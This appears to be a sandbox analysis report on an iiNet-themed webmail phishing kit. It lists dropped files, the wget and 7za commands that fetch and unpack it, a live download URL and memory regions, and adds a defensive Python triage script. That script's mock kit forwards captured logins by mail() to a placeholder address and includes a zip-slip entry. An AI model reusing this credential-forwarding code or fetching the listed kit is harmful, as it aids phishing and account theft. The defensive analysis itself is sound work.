Files

| File Path | Type | Category | Malicious |
|---|---|---|---|
| C:\Users\user\AppData\Local\Temp\nwe5galq.xcu\Webmail-iinet\index.html | HTML document, Unicode text, UTF-8 text, with very long lines (3461) | dropped | |
| C:\Users\user\Desktop\extract\Webmail-iinet\index.html | HTML document, Unicode text, UTF-8 text, with very long lines (3461) | dropped | |
| C:\Users\user\AppData\Local\Temp\nwe5galq.xcu\Webmail-iinet\css\app-059cd76ea4a5433e14ff6151a432ee48.css | ASCII text, with CRLF, LF line terminators | dropped | |
| C:\Users\user\AppData\Local\Temp\nwe5galq.xcu\Webmail-iinet\css\cb3cc3fa3480964080588c52478ae092-login.png | PNG image data, 763 x 207, 8-bit/color RGBA, non-interlaced | dropped | |
| C:\Users\user\AppData\Local\Temp\nwe5galq.xcu\Webmail-iinet\email.php | PHP script, ASCII text, with CRLF line terminators | dropped | |
| C:\Users\user\AppData\Local\Temp\nwe5galq.xcu\Webmail-iinet\images\iinet-logo.jpg | JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 405x239, components 3 | dropped | |
| C:\Users\user\AppData\Local\Temp\nwe5galq.xcu\Webmail-iinet\images\tmc-login.png | PNG image data, 381 x 103, 8-bit/color RGBA, non-interlaced | dropped | |
| C:\Users\user\AppData\Local\Temp\nwe5galq.xcu\Webmail-iinet\next.php | PHP script, ASCII text | dropped | |
| C:\Users\user\AppData\Local\Temp\unarchiver.log | ASCII text, with CRLF line terminators | dropped | |
| C:\Users\user\Desktop\cmdline.out | ASCII text, with CRLF line terminators | modified | |
| C:\Users\user\Desktop\download\Webmail-iinet.zip | Zip archive data, at least v2.0 to extract, compression method=store | dropped | |
| C:\Users\user\Desktop\extract\Webmail-iinet\css\app-059cd76ea4a5433e14ff6151a432ee48.css | ASCII text, with CRLF, LF line terminators | dropped | |
| C:\Users\user\Desktop\extract\Webmail-iinet\css\cb3cc3fa3480964080588c52478ae092-login.png | PNG image data, 763 x 207, 8-bit/color RGBA, non-interlaced | dropped | |
| C:\Users\user\Desktop\extract\Webmail-iinet\email.php | PHP script, ASCII text, with CRLF line terminators | dropped | |
| C:\Users\user\Desktop\extract\Webmail-iinet\images\iinet-logo.jpg | JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 405x239, components 3 | dropped | |
| C:\Users\user\Desktop\extract\Webmail-iinet\images\tmc-login.png | PNG image data, 381 x 103, 8-bit/color RGBA, non-interlaced | dropped | |
| C:\Users\user\Desktop\extract\Webmail-iinet\next.php | PHP script, ASCII text | dropped | |
| \Device\ConDrv | ASCII text, with CRLF, CR line terminators | dropped | |
Processes

| Path | Cmdline | Malicious |
|---|---|---|
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://maninhocontabilidade.com.br/pop/Webmail-iinet.zip" > cmdline.out 2>&1 | |
| C:\Windows\System32\conhost.exe | C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
| C:\Windows\SysWOW64\wget.exe | wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://maninhocontabilidade.com.br/pop/Webmail-iinet.zip" | |
| C:\Windows\SysWOW64\7za.exe | 7za x -y -pinfected -o"C:\Users\user\Desktop\extract" "C:\Users\user\Desktop\download\Webmail-iinet.zip" | |
| C:\Windows\System32\conhost.exe | C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
| C:\Windows\SysWOW64\unarchiver.exe | "C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Desktop\download\Webmail-iinet.zip" | |
| C:\Windows\SysWOW64\7za.exe | "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\nwe5galq.xcu" "C:\Users\user\Desktop\download\Webmail-iinet.zip" | |
| C:\Windows\System32\conhost.exe | C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
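An added triage example, not part of the sandbox report and not the kit's own code. The report gives the kit's layout (an index.html login page, email.php, next.php, css/ and images/) but not the file contents, and the processes above are only the sandbox harness fetching the ZIP with wget and unpacking it with 7za under the password infected. The script below inventories such an archive in memory instead of extracting it, flags server-side scripts and zip-slip entry names, and pulls URLs, e-mail addresses and the PHP calls kits typically use to forward captured credentials out of the text entries. The archive it builds, every file body in it and the recipient address are constructed for the demo; nothing about the real kit's contents is on this page.

```python
"""In-memory triage of a phishing-kit ZIP (added example; sample archive is constructed)."""
import io
import re
import zipfile
from posixpath import normpath

URL_RE = re.compile(r"https?://[^\s\"'<>)]+")
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+")
# Server-side extensions: anything here runs on the attacker's host, not in the victim's browser.
SERVER_SIDE = (".php", ".phtml", ".php5", ".asp", ".aspx", ".jsp", ".cgi", ".pl", ".py")
# Entry types worth scanning as text; images and fonts are skipped.
TEXT_EXT = (".php", ".html", ".htm", ".js", ".css", ".txt", ".htaccess")
# PHP calls commonly used by kits to log or mail stolen credentials and to bounce the victim on.
EXFIL_RE = re.compile(r"\b(mail|curl_exec|file_put_contents|fopen|fwrite|header)\s*\(")


def is_unsafe_path(name: str) -> bool:
    """True if extracting this entry name could land outside the target directory (zip-slip)."""
    clean = name.replace("\\", "/")
    if clean.startswith("/") or re.match(r"^[A-Za-z]:", clean):
        return True
    return ".." in normpath(clean).split("/")


def triage_kit(data: bytes, password: bytes = b"") -> dict:
    """Read every entry straight from the archive bytes and collect indicators.

    password: ZipCrypto password for samples shipped encrypted (zipfile has no AES support).
    """
    report = {"entries": [], "server_side": [], "unsafe_paths": [],
              "urls": set(), "emails": set(), "exfil_calls": {}}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        if password:
            zf.setpassword(password)
        for info in zf.infolist():
            if info.is_dir():
                continue
            name = info.filename
            lower = name.lower()
            report["entries"].append(name)
            if is_unsafe_path(name):
                report["unsafe_paths"].append(name)
            if lower.endswith(SERVER_SIDE):
                report["server_side"].append(name)
            if not lower.endswith(TEXT_EXT):
                continue
            text = zf.read(name).decode("utf-8", errors="replace")
            report["urls"].update(URL_RE.findall(text))
            report["emails"].update(EMAIL_RE.findall(text))
            calls = sorted(set(EXFIL_RE.findall(text)))
            if calls and lower.endswith(SERVER_SIDE):
                report["exfil_calls"][name] = calls
    return report


def build_sample_kit() -> bytes:
    """Constructed stand-in for Webmail-iinet.zip; file bodies and the mailbox are invented."""
    files = {
        "Webmail-iinet/index.html": (
            '<link rel="stylesheet" href="css/app-059cd76ea4a5433e14ff6151a432ee48.css">\n'
            '<form method="post" action="email.php">'
            '<input name="email"><input name="password" type="password"></form>\n'
            '<script src="https://code.jquery.com/jquery-3.2.1.slim.min.js"></script>\n'
        ),
        "Webmail-iinet/email.php": (
            "<?php\n"
            "$ip = $_SERVER['REMOTE_ADDR'];\n"
            "$msg = 'Login: ' . $_POST['email'] . ' Pass: ' . $_POST['password']\n"
            "     . ' Geo: http://www.geoiptool.com/?IP=' . $ip;\n"
            "mail('dropbox@example.invalid', 'iinet result', $msg);  // constructed recipient\n"
            "header('Location: next.php');\n"
        ),
        "Webmail-iinet/next.php": "<?php header('Location: https://www.google.com/'); ?>\n",
        "Webmail-iinet/images/iinet-logo.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 16,
        # Deliberate zip-slip entry so the path check has something to catch.
        "Webmail-iinet/../../evil.php": "<?php echo 1; ?>\n",
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        for name, body in files.items():
            zf.writestr(name, body)
    return buf.getvalue()


if __name__ == "__main__":
    result = triage_kit(build_sample_kit())
    for key, value in result.items():
        print(f"{key}: {sorted(value) if isinstance(value, set) else value}")
```

To run it against a real sample stored the way the sandbox stored this one, pass the archive bytes and password=b"infected"; the zip-slip check matters because 7za and similar tools will happily write an entry named with ../ outside the chosen output directory unless told otherwise.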
URLs

| Name | IP | Malicious |
|---|---|---|
| https://maninhocontabilidade.com.br/pop/Webmail-iinet.zip | | |
| https://www.google.com | unknown | |
| https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js | unknown | |
| https://code.jquery.com/jquery-3.2.1.slim.min.js | unknown | |
| https://stackoverflow.com/a/19758620 | unknown | |
| http://www.geoiptool.com/?IP=$ip | unknown | |
| http://ns.attribution.com/ads/1.0/ | unknown | |
| https://static.atmail.com/TMC/whitebg.png") | unknown | |
| https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js | unknown | |
| https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js | unknown | |
| http://codepen.io/mrrocks/pen/EiplA | unknown | |
| https://stackoverflow.com/a/9422689 | unknown | |
| https://www.google.com/ | unknown | |
| https://maninhocontabilidade.com.br/pop/Webmail-iinet.zip | 191.37.38.39 | |
| https://maninhocontabilidade.com.br/pop/Webmail-iinet.zipL=6PR | unknown | |
Domains

| Name | IP | Malicious |
|---|---|---|
| bg.microsoft.map.fastly.net | 199.232.210.172 | |
| maninhocontabilidade.com.br | 191.37.38.39 | |
| fp2e7a.wpc.phicdn.net | 192.229.221.95 | |
IPs

| IP | Domain | Country | Malicious |
|---|---|---|---|
| 191.37.38.39 | maninhocontabilidade.com.br | Brazil | |
Memdumps

| Base Address | Regiontype | Protect | Malicious |
|---|---|---|---|
| 9B000 | stack | page read and write | |
| 5F0000 | heap | page read and write | |
| 2B3E000 | stack | page read and write | |
| 2F00000 | heap | page read and write | |
| 123C000 | stack | page read and write | |
| 2AD4000 | heap | page read and write | |
| 1C6000 | heap | page read and write | |
| 548E000 | stack | page read and write | |
| 2A9A000 | heap | page read and write | |
| 9D6000 | stack | page read and write | |
| 2ACE000 | heap | page read and write | |
| 1057000 | trusted library allocation | page execute and read and write | |
| 1D0000 | heap | page read and write | |
| 2DCF000 | stack | page read and write | |
| 100000 | heap | page read and write | |
| 14E000 | stack | page read and write | |
| CD5000 | heap | page read and write | |
| 1230000 | heap | page read and write | |
| 31B0000 | trusted library allocation | page read and write | |
| 2EBA000 | trusted library allocation | page read and write | |
| 2EF5000 | trusted library allocation | page read and write | |
| 1440000 | heap | page read and write | |
| D50000 | trusted library allocation | page read and write | |
| 7F0000 | trusted library allocation | page read and write | |
| D52000 | trusted library allocation | page execute and read and write | |
| A00000 | trusted library allocation | page read and write | |
| 2710000 | trusted library allocation | page read and write | |
| 150000 | heap | page read and write | |
| 2AC6000 | heap | page read and write | |
| D7A000 | heap | page read and write | |
| 111E000 | stack | page read and write | |
| 1E0000 | heap | page read and write | |
| 9E8000 | heap | page read and write | |
| 1BE000 | stack | page read and write | |
| 5B0000 | heap | page read and write | |
| D30000 | trusted library allocation | page read and write | |
| 1370000 | heap | page read and write | |
| 13BE000 | stack | page read and write | |
| 2ACE000 | heap | page read and write | |
| 2ECA000 | trusted library allocation | page read and write | |
| A48000 | heap | page read and write | |
| 544E000 | stack | page read and write | |
| D4A000 | trusted library allocation | page execute and read and write | |
| 501E000 | stack | page read and write | |
| 520E000 | stack | page read and write | |
| 2AD2000 | heap | page read and write | |
| 1420000 | heap | page read and write | |
| C9E000 | stack | page read and write | |
| 8DC000 | stack | page read and write | |
| C50000 | heap | page read and write | |
| 105B000 | trusted library allocation | page execute and read and write | |
| 7DE000 | stack | page read and write | |
| 2AD7000 | heap | page read and write | |
| D0F000 | stack | page read and write | |
| D5C000 | trusted library allocation | page execute and read and write | |
| 2605000 | heap | page read and write | |
| 10A0000 | heap | page read and write | |
| 2ACA000 | heap | page read and write | |
| 7E0000 | heap | page read and write | |
| 1400000 | trusted library allocation | page execute and read and write | |
| 2600000 | heap | page read and write | |
| 75D000 | stack | page read and write | |
| 17D000 | heap | page read and write | |
| 2AD4000 | heap | page read and write | |
| 2A90000 | heap | page read and write | |
| 2EB0000 | trusted library allocation | page read and write | |
| D42000 | trusted library allocation | page execute and read and write | |
| 9E0000 | heap | page read and write | |
| 2EBC000 | trusted library allocation | page read and write | |
| 1430000 | trusted library allocation | page read and write | |
| 1450000 | trusted library allocation | page read and write | |
| 10C0000 | heap | page read and write | |
| 17DF000 | stack | page read and write | |
| 2AD7000 | heap | page read and write | |
| 103E000 | stack | page read and write | |
| 13F0000 | trusted library allocation | page read and write | |
| 2AC6000 | heap | page read and write | |
| E0F000 | stack | page read and write | |
| 56C000 | stack | page read and write | |
| C40000 | heap | page read and write | |
| 79E000 | stack | page read and write | |
| D7E000 | heap | page read and write | |
| 558E000 | stack | page read and write | |
| 2BCE000 | stack | page read and write | |
| 1C0000 | heap | page read and write | |
| 1050000 | trusted library allocation | page read and write | |
| D1E000 | stack | page read and write | |
| 5E0000 | heap | page read and write | |
| 9D9000 | stack | page read and write | |
| 2A9D000 | heap | page read and write | |
| 2610000 | heap | page read and write | |
| 2AD7000 | heap | page read and write | |
| 2AD7000 | heap | page read and write | |
| 17B000 | heap | page read and write | |
| 1510000 | heap | page read and write | |
| 1518000 | heap | page read and write | |
| DAF000 | stack | page read and write | |
| 140E000 | stack | page read and write | |
| 18DF000 | stack | page read and write | |
| 175000 | heap | page read and write | |
| 170000 | heap | page read and write | |
| 104A000 | trusted library allocation | page execute and read and write | |
| DAE000 | heap | page read and write | |
| 1420000 | heap | page execute and read and write | |
| 51CD000 | stack | page read and write | |
| 530D000 | stack | page read and write | |
| D70000 | heap | page read and write | |
| 2ACA000 | heap | page read and write | |
| 2AD7000 | heap | page read and write | |
| 133D000 | stack | page read and write | |
| 534E000 | stack | page read and write | |
| 109E000 | stack | page read and write | |
| D5A000 | trusted library allocation | page execute and read and write | |
| 122E000 | stack | page read and write | |
| 9CC000 | stack | page read and write | |
| 2AD5000 | heap | page read and write | |
| 17E000 | heap | page read and write | |
| 3080000 | heap | page read and write | |
| 2EE7000 | trusted library allocation | page read and write | |
| 13C0000 | heap | page read and write | |
| 274F000 | stack | page read and write | |
| CD0000 | heap | page read and write | |
| 50CE000 | stack | page read and write | |
| 2EDF000 | trusted library allocation | page read and write | |
| 2EEA000 | trusted library allocation | page read and write | |
| 1042000 | trusted library allocation | page execute and read and write | |
| A40000 | heap | page read and write | |
| 1120000 | heap | page read and write | |
| 31A0000 | heap | page read and write | |
| 2ED5000 | trusted library allocation | page read and write | |
| 2EF0000 | trusted library allocation | page read and write | |
| 2E81000 | trusted library allocation | page read and write | |
| 3E81000 | trusted library allocation | page read and write | |
| D96000 | heap | page read and write | |
| 2EE2000 | trusted library allocation | page read and write | |
| 17C000 | heap | page read and write | |
| 31A5000 | heap | page read and write | |
| 7F270000 | trusted library allocation | page execute and read and write | |